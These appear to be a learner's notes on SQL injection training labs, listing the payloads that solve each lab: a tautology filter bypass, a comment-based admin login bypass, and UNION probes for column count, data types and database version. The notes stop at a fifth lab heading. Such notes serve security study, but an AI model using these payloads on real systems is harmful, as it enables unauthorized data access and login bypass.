SQL injection
_________________________________________________________________________________________
Lab1.Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data

SELECT * FROM products WHERE category = 'Gifts' AND released = 1

Ans :" GET /filter?category='+or+1%3d1-- HTTP/2 "
SELECT * FROM products WHERE category = 'Gifts' or 1=1 --

_________________________________________________________________________________________
Lab2 : Lab: SQL injection vulnerability allowing login bypass
       select user from users where username='admin' and password='xyzz';

Ans :  select user from users where username='admin' -- ;
       Set-Cookie: session=97DAaA1HHJNKuXkRqL6HoyyNuaDbeHj1; 

_________________________________________________________________________________________
Lab3 : Lab: SQL injection attack, querying the database type and version on Oracle

Ans  : category='
       category='--+

    - No of columns
       'union select null from dual--
       'union select null,null from dual--

    -  String / data type of colums
       'union select 'ABC',NULL from dual--

    - Version OF DB
       'UNION SELECT BANNER,NULL FROM v$version--


___________________________________________________________________________________________
Lab4 : SQL injection attack, querying the database type and version on MySQL and Microsoft

Ans  : GET /filter?category='
       GET /filter?category='--+

     - No of Columns
       ' union select null --+ Error
       ' union select null,null --+ 

       ' order by 1--+
       ' order by 2--+
       ' order by 3--+ Error
     - Data Type
       ' union select 'ABC','DEF' --+
     -MySQL and Microsoft DB Version
       ' union select @@version,'DEF' --+


___________________________________________________________________________________________
Lab5: SQL injection attack, listing the database contents on non-Oracle databases
